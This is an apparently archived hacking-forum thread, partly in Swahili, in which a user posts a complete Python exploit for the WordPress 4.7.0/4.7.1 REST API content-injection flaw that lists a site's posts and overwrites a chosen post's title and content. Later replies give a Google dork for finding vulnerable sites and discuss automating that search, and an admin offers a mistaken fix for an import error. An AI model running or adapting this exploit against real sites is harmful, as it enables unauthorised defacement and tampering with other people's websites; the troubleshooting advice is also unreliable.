WordPress Unauthorized Content Injection Exploit

Pythonistas here you go...
User avatar
0x47
Noob
Noob
Posts: 4
Joined: Tue Aug 01, 2017 5:02 pm
x 3

WordPress Unauthorized Content Injection Exploit

#1

Unread post by 0x47 » Fri Oct 13, 2017 8:57 pm

Code: Select all

#! /usr/bin/env python

"""
Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
Wordpress Version Affected: 4.7.0/4.7.1

2017 - Coded by 0x47.
"""
import re
import json
from urllib.request import urlopen
from urllib.request import Request

class WpContent:
	def __init__(self, url):
		self.__url = url
		self.__response = urlopen(self.__url).read().decode('utf-8')

	def get_api_wp(self):
		return re.findall("https://api.w.org/' href='(.*)'", self.__response)[0]

	def get_wp_version(self):
		check_version = re.findall(r'ver=(.*)"', self.__response)[0]
		if check_version == "4.7" or check_version == "4.7.1":
			check_version += " ( Maybe vulnerable to inject ) "
		else:
			check_version += " ( Maybe not vulnerable to inject ) "
		return check_version

	def get_wp_post_information(self):
		page = urlopen(self.get_api_wp()+"wp/v2/posts")
		get_post = page.read()
		get_post = get_post.decode('utf-8')
		load_info = json.loads(get_post)
		collected_information = ""
		for load in load_info:
			collected_information += "[x] Post ID: {0}\n[x] Post Title: {1}\n[x] Post URL: {2}\n[x] Post Content: {3} [SNIPPET]\n\n".\
			format(load['id'], load['title']['rendered'].encode("utf-8"), load['link'], load['content']['rendered'][:100].encode('utf-8'))
		return collected_information

	def inject_content(self, id_content, title, content):
		data = json.dumps({
			'title':title,
			'content':content
			})
		params = {'Content-Type':'application/json'}
		full_url = self.get_api_wp() + "wp/v2/posts/{0}/?id={0}CBF".format(id_content)
		req = Request(full_url, data.encode("utf-8"), params)
		resp = urlopen(req).read()
		return resp

def main():
	print("[X] WORDPRESS 4.7.0/4.7.1 CONTENT INJECTION EXPLOIT [X]\n")
	while True:
		url = input("[x] Enter the URL: ")
		print("[?] Please wait ...\n")
		wpcontent = WpContent(url)
		wp_version = wpcontent.get_wp_version().split()[0]
		print("[x] Wordpress Version: {0} ".format(wp_version))
		if(wp_version == "4.7" or wp_version == "4.7.1"):
			select = input("[x] It's affected version. It seems vulnerable, continue? [y/n] ").lower()
			while(select != "y" and select != "n"):
				print("[x] Wrong selection! Try again.")
				select = input("[x] Affected version. Seems vulnerable, continue? [y/n] ").lower()
			print("\n")
			if(select == "y"):
				print("[x] Parsing data information, please wait ...\n")
				wp_information = wpcontent.get_wp_post_information()
				print(wp_information)
				inp_id = input("[x] Enter ID Content that you want to overwrite: ")
				inp_title = input("[x] Change title: ")
				print("\n")
				print("=> 1. Load data from file.")
				print("=> 2. Input data.")
				print("\n")
				mode = input("[x] Change content by [1/2] ? ")
				if mode == 1:
					dfile = input("[x] Enter the filename: ")
					with open(dfile, 'r') as f:
						readf = f.readlines()
					print("[x] Exploit in progress ...\n")
					wpcontent.inject_content(inp_id, inp_title, ''.join(readf))
				else:
					inp_data = input("[?] Input data: ")
					print("[x] Exploit in progress ...\n")
					wpcontent.inject_content(inp_id, inp_title, inp_data)
				print("[x] Update success!\n")
				cont = input("[?] Continue ? [y/n] ").lower()
				while(cont != "y" and cont != "n"):
					print("[x] Wrong selection! Try again.")
					cont = input("[?] Continue ? [y/n] ").lower()
				if cont == "n": break
			else:
				break
		else:
			cont = input("[?] Continue ? ").lower()
			while(cont != "y" and cont != "n"):
				print("[x] Wrong selection! Try again.")
				cont = input("[?] Continue ? ").lower()
			if cont == "n": break

if __name__ == '__main__':
	main()
0 x

Tags:

User avatar
mkaly123
Skilled
Skilled
Posts: 10
Joined: Wed Aug 02, 2017 8:34 am
Location: unknown
x 3

Re: WordPress Unauthorized Content Injection Exploit

#2

Unread post by mkaly123 » Fri Oct 13, 2017 9:32 pm

tunatumiaje hyo exploit//??
1 x

User avatar
0x47
Noob
Noob
Posts: 4
Joined: Tue Aug 01, 2017 5:02 pm
x 3

Re: WordPress Unauthorized Content Injection Exploit

#3

Unread post by 0x47 » Fri Oct 13, 2017 10:32 pm

mkaly123 wrote:
Fri Oct 13, 2017 9:32 pm
tunatumiaje hyo exploit//??
1) Kwanza Wordpress Version Affected ni kuanzia 4.7.0 - 4.7.1

Finding Vulnerable Target:

2) Ingia google type hii dork intext:"Index of wp-includes/rest-api"

3) Open command prompt au terminal. Ila hakikisha kwamba umeweka atleast Python 3.x kwenye PATH variables zako, iliuweza kuicall moja kwa moja kwenye terminal au cmd prompt.

4) Type python wp_exploit.py kisha hit ENTER. Hiyo wp_exploit ni jina ambalo utasave nalo hiyo exploit yako, unaeza ipa jina lolote.

5) Utafuata steps ambazo itakuwa inakuprompt mpaka itakapomaliza kazi.
0 x

User avatar
Fuck face
Noob
Noob
Posts: 1
Joined: Thu Oct 26, 2017 4:07 pm
x 1

Re: WordPress Unauthorized Content Injection Exploit

#4

Unread post by Fuck face » Fri Oct 27, 2017 7:57 am

Neat code. Huwez automate hyo Google dork URL search ??
1 x

User avatar
xpl0it
Admin
Admin
Posts: 113
Joined: Mon May 08, 2017 1:36 am
Location: 127.0.0.1
x 31
x 8
Contact:

Re: WordPress Unauthorized Content Injection Exploit

#5

Unread post by xpl0it » Mon Oct 30, 2017 12:38 am

Fuck face wrote:
Fri Oct 27, 2017 7:57 am
Neat code. Huwez automate hyo Google dork URL search ??
Yea inawezekana.. unaweza tu ukafix hiyo code
0 x

User avatar
mr_c0d3
Noob
Noob
Posts: 1
Joined: Fri Oct 05, 2018 9:05 pm
x 1

Re: WordPress Unauthorized Content Injection Exploit

#6

Unread post by mr_c0d3 » Fri Oct 05, 2018 10:47 pm

ImportError: No module named request

napata hiyo error
1 x

User avatar
xpl0it
Admin
Admin
Posts: 113
Joined: Mon May 08, 2017 1:36 am
Location: 127.0.0.1
x 31
x 8
Contact:

Re: WordPress Unauthorized Content Injection Exploit

#7

Unread post by xpl0it » Fri Oct 05, 2018 10:55 pm

mr_c0d3 wrote:
Fri Oct 05, 2018 10:47 pm
ImportError: No module named request

napata hiyo error
Tumia

Code: Select all

sudo pip install requests
kama umeinstall pip au

Code: Select all

sudo pip3 install requests
kama umeinstall pip3.. :)
0 x

Post Reply

Who is online

Users browsing this forum: No registered users and 1 guest